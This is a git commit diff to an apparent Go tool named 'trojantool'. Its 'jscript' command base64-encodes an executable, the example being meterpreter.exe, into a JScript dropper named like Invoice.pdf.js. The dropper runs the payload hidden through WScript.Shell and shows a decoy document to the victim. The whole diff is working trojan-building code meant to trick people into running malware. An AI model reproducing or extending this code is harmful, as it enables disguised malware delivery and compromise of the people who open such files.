JScript should work now

2023-08-10 21:53:50 +02:00 · 2023-08-10 21:53:50 +02:00 · b3b35f6011
parent 4f2165a71d
commit b3b35f6011
2 changed files with 58 additions and 6 deletions
--- a/cmd/jscript.go
+++ b/cmd/jscript.go
@ -1,12 +1,11 @@
-/*
-Copyright © 2023 NAME HERE <EMAIL ADDRESS>
-*/
 package cmd

 import (
 	_ "embed"
-	"fmt"
+	"encoding/base64"
 	"github.com/spf13/cobra"
+	"os"
+	"text/template"
 )

 //go:embed jscript.gojs
@ -23,7 +22,57 @@ Example:
 trojantool jscript --output Invoice.pdf.js --decoy Invoice.pdf meterpreter.exe
 `,
 	Run: func(cmd *cobra.Command, args []string) {
-		fmt.Println("jscript called")
+		type OutData struct {
+			Encoded      string
+			EncodedDecoy string
+		}
+
+		var outData OutData
+		tmpl := template.Must(template.New("").Parse(jscriptTmpl))
+		if len(args) != 1 {
+			cmd.PrintErr("Please specify one Input file! \n")
+			_ = cmd.Help()
+			os.Exit(1)
+		}
+		input := args[0]
+		if input == "" {
+			cmd.PrintErr("You need to specify an input file!")
+		}
+		output, _ := cmd.Flags().GetString("output")
+
+		content, err := os.ReadFile(input)
+		if err != nil {
+			cmd.PrintErrf("Could not read Input file: %s", err)
+		}
+		outData.Encoded = base64.StdEncoding.EncodeToString(content)
+
+		decoy, err := cmd.Flags().GetString("decoy")
+		if err != nil {
+			cmd.PrintErrf("Could not get Decoy file: %s", err)
+		}
+		if decoy != "" {
+			decoyContent, err := os.ReadFile(decoy)
+			if err != nil {
+				cmd.PrintErrf("Could not get Decoy Content file: %s", err)
+			}
+			outData.EncodedDecoy = base64.StdEncoding.EncodeToString(decoyContent)
+		}
+
+		outFile, err := os.Create(output)
+		if err != nil {
+			cmd.PrintErrf("Could not create output file: %s", err)
+		}
+		defer func(outFile *os.File) {
+			err := outFile.Close()
+			if err != nil {
+
+			}
+		}(outFile)
+		err = tmpl.Execute(outFile, outData)
+		if err != nil {
+			cmd.PrintErrf("Could not create output file: %s", err)
+		}
+
 	},
 }

--- a/cmd/jscript.gojs
+++ b/cmd/jscript.gojs
@ -8,6 +8,7 @@ var bytes = stream.Read();
 var shell = new ActiveXObject("WScript.Shell");
 shell.Run(bytes, 0, false);

+{{if len .EncodedDecoy}}
 var stream2 = new ActiveXObject("ADODB.Stream");
 stream.Type = 1;

@ -16,4 +17,6 @@ stream.Write(window.atob({{.EncodedDecoy}}));
 var bytes = stream.Read();
 shell.Popup(bytes, 0, "Document", 0x40);

-// vim: syntax=javascript
+{{end}}
+
+{{/* vim: syntax=javascript */}}